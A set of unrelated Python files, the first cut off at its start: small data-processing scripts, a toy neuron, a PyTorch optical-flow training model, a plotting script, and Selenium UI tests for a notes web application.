for word in pretty_words:
testdir[word].append("".join(sorted(word)))
for word in pretty_words:
word_comparison["".join(sorted(word))]
for key, value in testdir.items():
if (len(key)) > 1:
for other_key in word_comparison.keys():
if (len(other_key)) > 1:
if value[0] == other_key:
# if value[0] in other_key:
word_comparison[other_key].append(key)
for key, value in word_comparison.items():
if len(value) > 1:
print(value)
|
filename = 'PA_final.txt'
filename1 = 'PA_final1.txt'
filename2 = 'PR_final1.txt'
with open(filename) as f:
data = f.read()
data = data.split('\n')
f1 = open(filename1,'w')
f2 = open(filename2,'w')
for num in range(0,len(data)):
if(num%6 < 3):
f1.write(data[num])
f1.write('\n')
else:
f2.write(data[num])
f2.write('\n')
f1.close()
f2.close()
|
#! /usr/bin/python
import sys
def read_list(utt2spk_file):
"""
convert utt2spk to dictionary, {utt_id:spkr_id}
"""
fin = open(utt2spk_file)
utt_dict = {}
for i in fin:
utt_id = i.strip().split(' ')[0]
spkr_id = i.strip().split(' ')[-1]
utt_dict[utt_id.strip()] = spkr_id.strip()
fin.close()
return utt_dict
if __name__=='__main__':
"""
Takes train and test utt2spk files and returns a list of trials and a
corresponding key file.
inputs:
1. train utt2spk,
2. test utt2spk,
3. output trial filename
outputs:
1. output trial
1. output keys ==> name will be [trial_filename.key]
"""
trn_utt2spk = sys.argv[1]
tst_utt2spk = sys.argv[2]
trials_filename = sys.argv[3]
trn_utt = read_list(trn_utt2spk)
tst_utt = read_list(tst_utt2spk)
ftrials = open(trials_filename,'w')
fkey = open(trials_filename+'.key','w')
for i in tst_utt:
tst_spkr = tst_utt[i]
for j in trn_utt:
trn_spkr = trn_utt[j]
key_val = 'nontarget'
if (trn_spkr == tst_spkr):
key_val = 'target'
ftrials.write(j+'\t'+i+'\t'+key_val+'\n')
fkey.write(key_val+'\n')
ftrials.close()
fkey.close()
|
import math
class Neuron():
def __init__(self):
self.x = []
self.w = []
self.sum = 0
self.y = 0
def add_weights(self, *args):
self.w.extend(args)
def add_x(self, *args):
self.x.extend(args)
def summator(self, b=0):
for i in range(len(self.x)):
self.sum += self.x[i] * self.w[i]
self.sum += b
def step_func(self, z=0):
if self.sum >= z:
self.y = 1
else:
self.y = 0
def sigmoid_func(self):
func = 1 / (1 + math.exp(-self.sum))
if func > 0.99:
self.y = 1
elif func < 0.01:
self.y = 0
else:
self.y = func
def clear_all(self):
self.x = []
self.w = []
self.sum = 0
self.y = 0
''' Test
network = Neuron()
network.add_x(1, 1)
network.add_weights(-2, 5)
network.summator()
network.step_func()
print(f'Step function: {network.y}')
network.sigmoid_func()
print(f'Sigmoid function: {network.y}')
'''
|
"""Model class template
This module provides a template for users to implement custom models.
You can specify '--model template' to use this model.
The class name should be consistent with both the filename and its model option.
The filename should be <model>_dataset.py
The class name should be <Model>Dataset.py
It implements a simple image-to-image translation baseline based on regression loss.
Given input-output pairs (data_A, data_B), it learns a network netG that can minimize the following L1 loss:
min_<netG> ||netG(data_A) - data_B||_1
You need to implement the following functions:
<modify_commandline_options>: Add model-specific options and rewrite default values for existing options.
<__init__>: Initialize this model class.
<set_input>: Unpack input data and perform data pre-processing.
<forward>: Run forward pass. This will be called by both <optimize_parameters> and <test>.
<optimize_parameters>: Update network weights; it will be called in every training iteration.
"""
import torch
from torch.autograd import Variable
from .base_model import BaseModel
from . import networks
from . import pwclite
class WarpModel(BaseModel):
@staticmethod
def modify_commandline_options(parser, is_train=True):
"""Add new model-specific options and rewrite default values for existing options.
Parameters:
parser -- the option parser
is_train -- if it is training phase or test phase. You can use this flag to add training-specific or test-specific options.
Returns:
the modified parser.
"""
parser.set_defaults(dataset_mode='visha', lr=5e-3, batch_size=8, preprocess='resize', load_size=512, no_epoch=True, save_by_iter=True, load_iter=50000, print_freq=1, display_ncols=10)
parser.add_argument('--weight_decay', type=float, default=5e-4, help='weight decay for optimizer')
parser.add_argument('--momentum', type=float, default=0.9, help='momentum for sgd optimizer')
parser.add_argument('--num_classes', type=int, default=1, help='number of classes')
parser.add_argument('--backbone', type=str, default='mobilenet', help='backbone net type')
parser.add_argument('--output_stride', type=int, default=16, help='number of output stride')
parser.add_argument('--sync_bn', default=None, help='synchronized batchnorm or not')
parser.add_argument('--freeze_bn', default=False, help='freeze bacthnorm or not')
parser.add_argument('--iter_num', type=int, default=50000, help='number of iterations')
parser.add_argument('--lr_decay', type=float, default=0.9, help='learning rate decay rate')
parser.add_argument('--pretrained_model', default='checkpoints/pwclite_ar.tar')
parser.add_argument('--test_shape', default=[448, 1024], type=int, nargs=2)
parser.add_argument('--n_frames', type=int, default=2)
parser.add_argument('--upsample', default=True)
parser.add_argument('--reduce_dense', default=True)
return parser
def __init__(self, opt):
"""Initialize this model class.
Parameters:
opt -- training/test options
A few things can be done here.
- (required) call the initialization function of BaseModel
- define loss function, visualization images, model names, and optimizers
"""
BaseModel.__init__(self, opt) # call the initialization method of BaseModel
# specify the training losses you want to print out. The program will call base_model.get_current_losses to plot the losses to the console and save them to the disk.
self.loss_names = ['first', 'second', 'sum']
# specify the images you want to save and display. The program will call base_model.get_current_visuals to save and display these images.
self.visual_names = ['data_A1', 'data_A2', 'data_B1', 'data_B2', 'flow12', 'flow21', 'transflow12', 'transflow21', 'pred1', 'pred2']
# specify the models you want to save to the disk. The program will call base_model.save_networks and base_model.load_networks to save and load networks.
# you can use opt.isTrain to specify different behaviors for training and test. For example, some networks will not be used during test, and you don't need to load them.
self.model_names = ['FW']
# define networks; you can use opt.isTrain to specify different behaviors for training and test.
self.netFW = networks.define_fw(opt.num_classes, opt.backbone, opt.output_stride, opt.sync_bn, opt.freeze_bn, gpu_ids=self.gpu_ids)
self.netFG = pwclite.PWCLite(opt).to(self.device)
self.netFG = pwclite.restore_model(self.netFG, opt.pretrained_model)
self.netFG.eval()
if self.isTrain: # only defined during training time
# define your loss functions. You can use losses provided by torch.nn such as torch.nn.L1Loss.
self.criterionFlow = torch.nn.MSELoss()
# define and initialize optimizers. You can define one optimizer for each network.
self.train_params = [{'params': self.netFW.module.get_1x_lr_params(), 'lr': opt.lr},
{'params': self.netFW.module.get_10x_lr_params(), 'lr': opt.lr * 10}]
self.optimizer = torch.optim.SGD(self.train_params, lr=opt.lr, momentum=opt.momentum, weight_decay=opt.weight_decay, nesterov=False)
self.optimizers = [self.optimizer]
# Our program will automatically call <model.setup> to define schedulers, load networks, and print networks
def set_input(self, input):
"""Unpack input data from the dataloader and perform necessary pre-processing steps.
Parameters:
input: a dictionary that contains the data itself and its metadata information.
"""
self.data_A1 = Variable(input['A1']).to(self.device) # get image data A
self.data_B1 = Variable(input['B1']).to(self.device) # get image data B
self.data_A2 = Variable(input['A2']).to(self.device)
self.data_B2 = Variable(input['B2']).to(self.device)
self.image_paths = input['A_paths'] # get image paths
def forward(self):
"""Run forward pass. This will be called by both functions <optimize_parameters> and <test>."""
flow_input1 = torch.nn.functional.interpolate(self.data_A1, size=self.opt.test_shape, mode='bilinear', align_corners=True)
flow_input2 = torch.nn.functional.interpolate(self.data_A2, size=self.opt.test_shape, mode='bilinear', align_corners=True)
flow_input = torch.cat([flow_input1, flow_input2], 1)
flow = self.netFG(flow_input)
self.flow12 = pwclite.resize_flow(flow['flows_fw'][0], (self.opt.load_size, self.opt.load_size))
self.flow21 = pwclite.resize_flow(flow['flows_bw'][0], (self.opt.load_size, self.opt.load_size))
self.pred1, self.pred2, self.transflow12, self.transflow21 = self.netFW(self.data_A1, self.data_A2, self.flow12, self.flow21)
def backward(self):
"""Calculate losses, gradients, and update network weights; called in every training iteration"""
# calculate loss given the input and intermediate results
self.loss_first = self.criterionFlow(self.pred1, self.data_B1)
self.loss_second = self.criterionFlow(self.pred2, self.data_B2)
self.loss_sum = self.loss_first + self.loss_second
self.loss_sum.backward()
def optimize_parameters(self):
"""Update network weights; it will be called in every training iteration."""
self.optimizer.zero_grad() # clear network G's existing gradients
self.forward() # first call forward to calculate intermediate results
self.backward() # calculate gradients for network G
self.optimizer.step() # update gradients for network G
def update_learning_rate(self, curr_iter):
"""Update learning rates for all the networks; called at the end of every epoch"""
if not self.opt.no_epoch:
old_lr = self.optimizers[0].param_groups[0]['lr']
for scheduler in self.schedulers:
if self.opt.lr_policy == 'plateau':
scheduler.step(self.metric)
else:
scheduler.step()
lr = self.optimizers[0].param_groups[0]['lr']
print('learning rate %.7f -> %.7f' % (old_lr, lr))
if self.opt.no_epoch:
old_lr = self.optimizers[0].param_groups[0]['lr']
self.optimizers[0].param_groups[0]['lr'] = 1 * self.opt.lr * (1 - float(curr_iter) / self.opt.iter_num) ** self.opt.lr_decay
self.optimizers[0].param_groups[1]['lr'] = 10 * self.opt.lr * (1 - float(curr_iter) / self.opt.iter_num) ** self.opt.lr_decay
lr = self.optimizers[0].param_groups[0]['lr']
print('learning rate %.7f -> %.7f' % (old_lr, lr))
|
__author__ = 'mehdi'
import numpy as np
import csv
from Comparision import Calculations
class IO:
def __init__(self, file_address, isshareprice):
try:
self.text_data = np.loadtxt(file_address,
delimiter=',',
dtype='str')
except Exception, e:
print str(e)
self.float_data = np.zeros((len(self.text_data)-1, len(self.text_data[1])-1))
for count_row in xrange(1, len(self.text_data)):
for count_col in xrange(1, len(self.text_data[count_row])):
if self.text_data[count_row][count_col] == ':' or self.text_data[count_row][count_col] == "":
if isshareprice:
self.float_data[count_row-1][count_col-1] = 0
else:
self.float_data[count_row-1][count_col-1] = -1
else:
self.float_data[count_row-1][count_col-1] = float(self.text_data[count_row][count_col])
@staticmethod
def write(output_address, parameter):
np.savetxt(output_address, parameter, delimiter=",")
@staticmethod
def main():
short_positions = 1
long_positions = 1
employment_data = IO('/home/mehdi/Desktop/Productivity.csv', False)
price_data = IO('/home/mehdi/Desktop/NS_M_CLI.csv', True)
start_calculations = Calculations(1000, price_data.float_data, employment_data.float_data)
start_calculations.comparison(long_positions, short_positions)
start_calculations.investment_algor()
IO.write('/home/mehdi/Desktop/results1_C.csv', start_calculations.investment)
IO.write('/home/mehdi/Desktop/results1_I.csv', start_calculations.cash)
short_positions = 3
long_positions = 3
start_calculations = Calculations(1000, price_data.float_data, employment_data.float_data)
start_calculations.comparison(long_positions, short_positions)
start_calculations.investment_algor()
IO.write('/home/mehdi/Desktop/results2_C.csv', start_calculations.investment)
IO.write('/home/mehdi/Desktop/results2_I.csv', start_calculations.cash)
short_positions = 5
long_positions = 5
start_calculations = Calculations(1000, price_data.float_data, employment_data.float_data)
start_calculations.comparison(long_positions, short_positions)
start_calculations.investment_algor()
IO.write('/home/mehdi/Desktop/results3_C.csv', start_calculations.investment)
IO.write('/home/mehdi/Desktop/results3_I.csv', start_calculations.cash)
@staticmethod
def main1():
employment_data = IO('/home/mehdi/Desktop/Employment_data.csv', '/home/mehdi/Desktop/CLI.csv', False)
employment_data.clear_dataset()
class Clean_dataset:
def __init__(self, file_address):
self.clear_data = []
try:
self.text_data = np.loadtxt(file_address,
delimiter=',',
dtype='str')
except Exception, e:
print str(e)
def clear_dataset(self):
i = -1
for count_row in xrange(0, len(self.text_data1)):
if self.text_data1[count_row][3] != self.text_data1[count_row-1][3]:
i += 1
self.clear_data.append([])
self.clear_data[i].append(self.text_data1[count_row][4])
with open('/home/mehdi/Desktop/CLI_Out.csv', 'wb') as out_file:
wr = csv.writer(out_file, quoting=csv.QUOTE_ALL)
wr.writerows(map(list, map(None, *self.clear_data)))
out_file.close()
IO.main()
|
import logging
import sys, os
import re
import argparse
labelSize = 20
legendSize = 20
titleSize = 36
def drawLine(xList, yList, resultFile, legends = None, xLabel = None, yLabel = None, title = None, colorList = None, opacity = 0.6, xRange = None, yRange = None, marker = "o"):
import matplotlib
#matplotlib.use('Agg')
import matplotlib.pyplot as plt
logger = logging.getLogger(__name__)
#figure = plt.figure(1)
figure, axis = plt.subplots()
#axis.spines['right'].set_visible(False)
#axis.spines['top'].set_visible(False)
axis.tick_params(labeltop='off', labelright='off')
#plot lines
lineObjList = []
for xSubList, ySubList in zip(xList, yList):
lineObj = plt.plot(xSubList, ySubList)
lineObj[0].set_alpha(opacity)
lineObj[0].set_marker(marker)
lineObjList.append(lineObj[0])
if colorList is not None:
for lineObj, color in zip(lineObjList, colorList):
lineObj.set_color(color)
logger.info("%d lines drawn", len(lineObjList))
#set up min/max of axixes
if xRange is not None:
plt.xlim(xRange)
if yRange is not None:
plt.ylim(yRange)
#set up labels of x and yaxis
if xLabel is not None:
plt.xlabel(xLabel, fontsize = labelSize)
if yLabel is not None:
plt.ylabel(yLabel, fontsize = labelSize)
#set up title
if title is not None:
plt.title(title, fontsize = titleSize)
#set up legends
if legends is not None:
plt.legend(lineObjList, legends, fontsize = legendSize)
#save to file
figure.savefig(resultFile + ".pdf", format = "pdf")
figure.savefig(resultFile + ".png", format = "png")
plt.clf()
if __name__ == "__main__":
parser = argparse.ArgumentParser("latency plot")
parser.add_argument("resultFile", type = str)
parser.add_argument("-limit", default = 10, type = int)
parser.add_argument("-startIndex", default = 0, type = int)
parser.add_argument("-sourceFileList", nargs = "+", type = str)
options = parser.parse_args()
sourceFileList = options.sourceFileList
resultFile = options.resultFile
limit = options.limit
availableLegends = ["End2End", "Trigger", "Trigger + Realtime", "Trigger + Action", "Trigger + Action + Realtime"]
availableColorList = ["b", "g", "r", "c", "m"]
xList = []
yList = []
if len(sourceFileList) > len(availableLegends):
print("provide too much files")
sys.exit(1)
for sourceFile in sourceFileList:
subYList = []
subXList = []
with open(sourceFile, "r") as fd:
index = 1
for line in fd:
yValue = float(line.strip())
xValue = index
subYList.append(yValue)
subXList.append(xValue)
index += 1
if index > limit:
break
xList.append(subXList)
yList.append(subYList)
lineNum = len(sourceFileList)
legends = availableLegends[options.startIndex: options.startIndex + lineNum]
xLabel = "Test No"
yLabel = "Latency (Seconds)"
drawLine(xList, yList, resultFile = resultFile, legends = legends, xLabel = xLabel, yLabel = yLabel, colorList = availableColorList[:lineNum], xRange = (0, limit + 1))
|
# -*- coding: utf-8 -*-
from selenium.common.exceptions import WebDriverException
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
import time
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common import exceptions
from sbase import NimbusSeleniumBaseTestCase
from attachment import AttachmentBaseTest
import json
class TestUi(NimbusSeleniumBaseTestCase, AttachmentBaseTest):
@staticmethod
def move_to(element, driver):
m_over = ActionChains(driver).move_to_element(element)
m_over.perform()
@staticmethod
def _get_folder_id_by_object(folder_object):
parent_folder = folder_object.find_element_by_xpath('..')
return parent_folder.get_attribute("id")
def setUp(self):
self.driver.implicitly_wait(100)
time.sleep(3)
def _default_state(self):
self.driver.get(self.url)
time.sleep(6)
my_notes_menu_item = self.driver.find_element_by_css_selector("li#default")
ActionChains(self.driver).move_to_element(my_notes_menu_item)
time.sleep(1)
my_notes_menu_item.click()
time.sleep(4)
def _substract_px(self, data_to_format):
data_to_format = int(data_to_format[:-2])
return data_to_format
def _select_folder_by_name(self, name):
return self.driver.find_element_by_css_selector(".folder_short.ng-binding[title='" + name + "']")
def _get_shared_link(self):
note_text = u"Some text"
folder_name = self._get_random_name(16)
folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
self.driver.refresh()
time.sleep(2)
folder = self._select_folder_by_name(folder_name)
folder.click()
time.sleep(2)
note_data = self._create_note_without_ui(
title = u"test_note",
text = note_text,
global_id = self._get_random_name(16),
parent_id=folder_data["global_id"]
)["body"]["notes"][0]
time.sleep(4)
note_id = note_data["global_id"]
attach_fname = '114-1024.JPG'
fixture_file = self.check_fixture_file(attach_fname)
attach = self._do_attachment_upload(fixture_file=fixture_file,
note_id=note_id, in_list= True)
time.sleep(2)
folder.click()
self.driver.refresh()
time.sleep(2)
share_unshare_button = self.driver.find_element_by_css_selector(".head_note a.share")
self.assertIsNotNone(share_unshare_button)
time.sleep(2)
share_unshare_button.click()
time.sleep(5)
link = self.driver.find_element_by_css_selector(".share_url .url_password")
link_text = link.get_attribute("value")
ok = self.driver.find_element_by_css_selector(".title_password .remove_select")
ok.click()
self.driver.get(link_text)
return attach_fname
def _create_note_without_ui(self, title=None, text=None, parent_id=None, global_id=None):
note_data = {
'type': 'note',
'url': 'https://www.google.com.ua/'
}
if global_id:
note_data["global_id"] = global_id
if text:
note_data["text"] = text
if title:
note_data["title"] = title
if parent_id:
note_data["parent_id"] = parent_id
post_data = {
'action': 'notes:update',
'body': {
'store': {
'notes': [note_data]
}
}
}
return self._do_request(data=post_data)
def _create_folder_without_ui(self, name):
note_data = {
'index': 0,
'type': 'folder',
'title': name
}
post_data = {
'action': 'notes:update',
'body': {
'store': {
'notes': [note_data]
}
}
}
return self._do_request(data=post_data)
def _get_notes_with_text(self, note_id):
post_data = {
'action': 'notes:get',
'body': {
'global_id': note_id
}
}
return self._do_request(data=post_data)
def _remove_item_without_ui(self, note_id):
post_data = {
'action': 'notes:update',
'body': {
'remove': {
'notes': [note_id]
}
}
}
return self._do_request(data=post_data)
def _context_click(self, element):
ActionChains(self.driver).context_click(element).perform()
time.sleep(2)
ActionChains(self.driver).context_click(element).perform()
def _select_folder_by_name(self, name):
return self.driver.find_element_by_css_selector(".folder_short.ng-binding[title='" + name + "']")
def _create_folder(self, name):
name = name if name else "not_set"
my_notes_menu_item = self.driver.find_element_by_css_selector("li#default")
ActionChains(self.driver).move_to_element(my_notes_menu_item)
time.sleep(4)
my_notes_menu_item.click()
time.sleep(4)
add_folder_button = WebDriverWait(self.driver, 5).until(
lambda x: x.find_element_by_css_selector("a.add_folder"))
add_folder_button.click()
text = self.driver.find_element_by_css_selector(".my_class")
text.clear()
text.send_keys(name)
self.driver.find_element_by_id("create_folder").click()
my_new_folder = self.driver.find_element_by_css_selector(".folder_short.ng-binding[title='" + name + "']")
return my_new_folder
def _create_new_note_in_current_folder(self):
time.sleep(2)
button_create_note = self.driver.find_element_by_css_selector(".btn-wrapper button.btn.blue")
button_create_note.click()
time.sleep(2)
def _set_text_to_current_note(self, text):
editor_frame = self.driver.find_element_by_css_selector("#notes_text_ifr")
self.driver.switch_to_frame(editor_frame)
body = self.driver.find_element_by_css_selector("body")
body.send_keys(text)
self.driver.switch_to_default_content()
def _del_folder_without_ui(self, id):
notes_ids = [id]
post_data = {
'action': 'notes:update',
'body': {
'remove': {
'notes': notes_ids
}
}
}
return self._do_request(data=post_data)
def _get_note_url_without_ui(self, id):
post_data = {
'action': 'notes:share',
'body': {
'toggle': {
'notes': [id]
}
}
}
return self._do_request(data=post_data)
def _click_new_note(self):
new_note = self.driver.find_element_by_css_selector(".btn-wrapper button")
return new_note
def _get_selectInFull(self):
save = self.driver.find_element_by_css_selector("#save_change_main")
save.click()
time.sleep(7)
self.driver.refresh()
time.sleep(10)
f_note = self.driver.find_element_by_css_selector(".notes_list li:first-child")
time.sleep(2)
ActionChains(self.driver).click(f_note).perform()
time.sleep(2)
edit = self.driver.find_element_by_css_selector(".edit")
edit.click()
selectinfull = self.driver.find_element_by_css_selector(".tag_line .tag_line_search form .chzn-choices li:nth-child(1) span")
return selectinfull
def test_hidding_left_block_scroll(self):
left_block = self.driver.find_element_by_css_selector('.jspPane')
left_block_width = left_block.value_of_css_property('width')
self.driver.set_script_timeout(15)
horizont_scroll = self.driver.find_element_by_css_selector('.jspContainer')
horizont_scroll_width = horizont_scroll.value_of_css_property('width')
self.assertEqual(self._substract_px(left_block_width), 207, 'left block width is too big')
self.assertEqual(self._substract_px(horizont_scroll_width), 207,
'horizont scroll width of left bloc is too big')
def test_share_unshare_item(self):
my_notes_menu_item = self.driver.find_element_by_css_selector("li#default")
my_notes_menu_item.click()
self.driver.implicitly_wait(500)
button_click_on_first_button = self.driver.find_element_by_css_selector(".notes_list li:first-child")
button_click_on_first_button.click()
self.driver.implicitly_wait(1500)
share_unshare_button = self.driver.find_element_by_css_selector(".head_note a.share")
self.assertIsNotNone(share_unshare_button)
share_unshare_button.click()
self.driver.implicitly_wait(1500)
share_button = self.driver.find_element_by_css_selector(".title_password .remove_select")
self.assertIsNotNone(share_button)
share_button.click()
self.driver.implicitly_wait(500)
share_unshare_button = self.driver.find_element_by_css_selector(".head_note a.share")
self.assertIsNotNone(share_unshare_button)
share_unshare_button.click()
unshare_button = self.driver.find_element_by_css_selector(".unshare_note")
self.assertIsNotNone(unshare_button)
unshare_button.click()
self.driver.refresh()
def test_share_button_color(self):
note_text = u"Some text"
folder_name = self._get_random_name(16)
folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
self.driver.refresh()
time.sleep(2)
folder = self._select_folder_by_name(folder_name)
folder.click()
time.sleep(2)
note_data = self._create_note_without_ui(
title = u"test_note",
text = note_text,
global_id = self._get_random_name(16),
parent_id=folder_data["global_id"]
)["body"]["notes"][0]
time.sleep(4)
folder.click()
self.driver.refresh()
time.sleep(5)
share_unshare_button = self.driver.find_element_by_css_selector(".head_note a.share")
self.assertIsNotNone(share_unshare_button)
share_unshare_button.click()
time.sleep(5)
share_button = self.driver.find_element_by_css_selector(".title_password .remove_select")
self.assertIsNotNone(share_button)
share_button.click()
self.driver.implicitly_wait(500)
share_unshare_button = self.driver.find_element_by_css_selector(".head_note a.share.active")
self.assertTrue(share_unshare_button.is_displayed())
self.driver.implicitly_wait(500)
share_unshare_button = self.driver.find_element_by_css_selector(".head_note a.share")
self.assertIsNotNone(share_unshare_button)
share_unshare_button.click()
self.driver.implicitly_wait(1000)
unshare_button = self.driver.find_element_by_css_selector(".unshare_note")
self.assertIsNotNone(unshare_button)
unshare_button.click()
self.assertRaises(
(exceptions.NoSuchElementException, WebDriverException),
self.driver.find_element_by_css_selector,
(".head_note a.share", )
)
self._del_folder_without_ui(folder_data["global_id"])
def test_checking_padding_short_text_container(self):
my_notes_menu_item = self.driver.find_element_by_css_selector("li#default")
ActionChains(self.driver).move_to_element(my_notes_menu_item)
time.sleep(2)
my_notes_menu_item.click()
time.sleep(2)
noteItemElement = self.driver.find_element_by_css_selector(".notes_list li:first-child")
self.assertIsNotNone(noteItemElement)
noteItemPaddingRight = noteItemElement.value_of_css_property('padding-right')
self.assertLess(19, self._substract_px(noteItemPaddingRight), 'Option padding-right is too small');
def test_focus_textarea_when_create_folder(self):
folder_name = self._get_random_name(12)
my_notes_menu_item = self.driver.find_element_by_css_selector("li#default")
ActionChains(self.driver).move_to_element(my_notes_menu_item)
time.sleep(2)
my_notes_menu_item.click()
time.sleep(2)
add_folder_button = self.driver.find_element_by_css_selector("a.add_folder")
time.sleep(2)
add_folder_button.click()
time.sleep(2)
active_textarea = self.driver.find_element_by_css_selector('.my_class')
active_element = self.driver.switch_to_active_element()
self.assertEqual(active_element, active_textarea)
cansel_button = self.driver.find_element_by_css_selector('.modal-footer button:last-child')
cansel_button.click()
def test_click_enter_in_create_folder_popup(self):
folder_name = self._get_random_name(12)
my_notes_menu_item = self.driver.find_element_by_css_selector("li#default")
ActionChains(self.driver).move_to_element(my_notes_menu_item)
time.sleep(2)
my_notes_menu_item.click()
time.sleep(2)
add_folder_button = self.driver.find_element_by_css_selector("a.add_folder")
time.sleep(2)
add_folder_button.click()
time.sleep(2)
active_textarea = self.driver.find_element_by_css_selector('.my_class')
time.sleep(2)
ActionChains(self.driver).send_keys_to_element(active_textarea, Keys.CONTROL + "a").perform()
time.sleep(2)
active_textarea.send_keys(folder_name)
time.sleep(5)
ActionChains(self.driver).send_keys_to_element(active_textarea, Keys.ENTER).perform()
time.sleep(4)
my_new_folder = self.driver.find_element_by_css_selector(
".folder_short.ng-binding[title='" + folder_name + "']")
time.sleep(2)
self.assertIsNotNone(my_new_folder)
id = self._get_folder_id_by_object(my_new_folder)
self._del_folder_without_ui(id)
def test_check_favicon(self):
my_favicon_a = self.driver.find_element_by_css_selector("link[rel=icon]")
my_favicon_b = self.driver.find_element_by_css_selector("link[rel='shortcut icon']")
self.assertTrue(my_favicon_a.is_enabled())
self.assertTrue(my_favicon_b.is_enabled())
def test_check_nbsp_when_viewing(self):
note_text = "<p> </p> <p>Some text</p>"
folder_name = self._get_random_name(16)
folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
self.driver.refresh()
time.sleep(2)
folder = self._select_folder_by_name(folder_name)
folder.click()
time.sleep(2)
note_data = self._create_note_without_ui(
title = u"test_note",
text = note_text,
global_id = self._get_random_name(16),
parent_id=folder_data["global_id"]
)["body"]["notes"][0]
time.sleep(4)
folder.click()
self.driver.refresh()
time.sleep(2)
button_click_on_first_note = self.driver.find_element_by_css_selector(".notes_list li:first-child")
button_click_on_first_note.click()
time.sleep(4)
empty = self.driver.find_element_by_css_selector("#scrollbarNotesText .jspPane:first-child p")
not_empty = self.driver.find_element_by_css_selector("#scrollbarNotesText .jspPane p:nth-last-child(1)")
self.assertEqual(empty.text, " ")
self.assertNotEqual(not_empty.text, " ")
delete_note_button = self.driver.find_element_by_css_selector(".action_buttons.head_note a.trash")
delete_note_button.click()
time.sleep(1)
confirmation_button = self.driver.find_element_by_css_selector("button.btn.btn-warning")
confirmation_button.click()
self._remove_item_without_ui(folder_data["global_id"])
def test_checking_quota_options(self):
user_button = self.driver.find_element_by_css_selector(".user_mail")
ActionChains(self.driver).move_to_element(user_button)
time.sleep(2)
user_button.click()
time.sleep(2)
settings_button = self.driver.find_element_by_css_selector(".user_mail ul li:nth-child(2)")
ActionChains(self.driver).move_to_element(settings_button)
time.sleep(2)
settings_button.click()
time.sleep(2)
quota_progresbar = self.driver.find_element_by_css_selector(".progress-striped.active.progress")
quota_time_end = self.driver.find_element_by_css_selector(".settings div p.ng-binding")
get_more_button = self.driver.find_element_by_css_selector('.progress_panel a')
self.assertFalse(get_more_button.is_displayed())
go_to_pro_link = self.driver.find_element_by_css_selector(
".settings div[ng-controller= 'UserController'] :nth-child(8)")
ActionChains(self.driver).move_to_element(go_to_pro_link)
time.sleep(2)
go_to_pro_link.click()
time.sleep(2)
self.driver.get(self.url)
self.driver.refresh()
def test_delete_empty_folder_and_go_to_default_folder(self):
my_notes_menu_item = self.driver.find_element_by_css_selector("li#default")
ActionChains(self.driver).move_to_element(my_notes_menu_item)
my_notes_menu_item.click()
time.sleep(2)
ActionChains(self.driver).move_to_element(self.driver.find_element_by_css_selector('.tree_nav'))
add_folder_button = self.driver.find_element_by_css_selector("a.add_folder")
add_folder_button.click()
time.sleep(2)
button_create_folder = self.driver.find_element_by_css_selector("button.btn.btn-warning")
self.assertIsNotNone(button_create_folder)
button_create_folder.click()
time.sleep(2)
my_new_folder = self.driver.find_element_by_css_selector(".folder_short.ng-binding[title='folder']")
self.assertIsNotNone(my_new_folder)
my_new_folder.click()
time.sleep(2)
self._context_click(my_new_folder)
context_delete_button = self.driver.find_element_by_css_selector('.dropdown-menu li:last-child a')
context_delete_button.click()
button_delete_note = self.driver.find_element_by_css_selector("button.btn.btn-warning")
self.assertIsNotNone(button_delete_note)
button_delete_note.click()
time.sleep(10)
folder_name = self.driver.find_element_by_css_selector(".head.notes")
folder_title = folder_name.get_attribute('title')
self.assertEqual(folder_title, "My Notes")
def test_todo_add_not_remove_text(self):
note_text = u"test text"
folder_name = self._get_random_name(16)
folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
self.driver.refresh()
time.sleep(2)
folder = self._select_folder_by_name(folder_name)
folder.click()
time.sleep(2)
note_data = self._create_note_without_ui(
title = u"test_note",
text = note_text,
global_id = self._get_random_name(16),
parent_id=folder_data["global_id"]
)["body"]["notes"][0]
time.sleep(4)
folder.click()
self.driver.refresh()
time.sleep(2)
add_todo = self.driver.find_element_by_css_selector(".btn.grey.todo")
add_todo.click()
time.sleep(1)
self.driver.find_element_by_css_selector(".todo_text").send_keys("to_todo")
time.sleep(2)
self.driver.find_element_by_css_selector(".btn-primary").click()
time.sleep(3)
self.driver.refresh()
time.sleep(2)
note = self.driver.find_element_by_css_selector("#all_text")
after_save_text = note.text
self.assertIsNotNone(after_save_text)
self.assertEqual(after_save_text, note_text)
self._remove_item_without_ui(folder_data["global_id"])
self._default_state()
def test_todo_add_not_remove_attach(self):
note_text = "<p>some text</p>"
folder_name = self._get_random_name(16)
folder_data = self._create_folder_without_ui(folder_name)["body"]["notes"][0]
self.driver.refresh()
time.sleep(4)
folder = self._select_folder_by_name(folder_name)
folder.click()
time.sleep(2)
note_data = self._create_note_without_ui(
title=u"test_note",
text=note_text,
parent_id=folder_data["global_id"]
)["body"]["notes"][0]
time.sleep(4)
folder.click()
note_id = note_data["global_id"]
attach_fname = '114-1024.JPG'
fixture_file = self.check_fixture_file(attach_fname)
attach = self._do_attachment_upload(fixture_file=fixture_file,
note_id=note_id)
text_with_attach = '<p> some text </p>'
note_data_2 = self._create_note_without_ui(
text=text_with_attach,
global_id=note_data["global_id"]
)["body"]["notes"]
time.sleep(4)
created_note = self.driver.find_element_by_id(note_id)
created_note.click()
time.sleep(8)
add_todo = self.driver.find_element_by_css_selector(".btn.grey.todo")
add_todo.click()
time.sleep(2)
self.driver.find_element_by_css_selector(".todo_text").send_keys(u"to_todo")
self.driver.find_element_by_css_selector(".btn-primary").click()
time.sleep(2)
self.driver.refresh()
time.sleep(4)
note_data_with_text = self._get_notes_with_text(note_id)["body"]["notes"][0]
note_text_after_save = note_data_with_text["text"]
self.assertEqual(note_text_after_save, text_with_attach)
self._remove_item_without_ui(folder_data["global_id"])
def test_open_close_attach_menu_in_main(self):
attach_fname = '114-1024.JPG'
data = self._create_folder_and_note_with_image_attach(in_list = True, attach_name = attach_fname)
open_close_attach_button = self.driver.find_element_by_css_selector('.btn.grey.attache.edit_mode.main_view')
open_close_attach_button.click()
first_note = self.driver.find_element_by_css_selector('.notes_content .attaches_list li:first-child .attachments_names')
attaches_menu = self.driver.find_element_by_css_selector('.notes_content .attaches_menu')
self.assertTrue(first_note.is_displayed())
self.assertTrue(attaches_menu.is_displayed())
